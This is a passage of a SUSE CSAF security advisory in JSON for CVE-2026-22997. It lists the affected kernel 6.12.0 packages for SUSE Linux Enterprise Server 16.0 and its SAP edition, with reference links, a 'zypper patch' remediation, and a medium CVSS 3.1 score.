"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
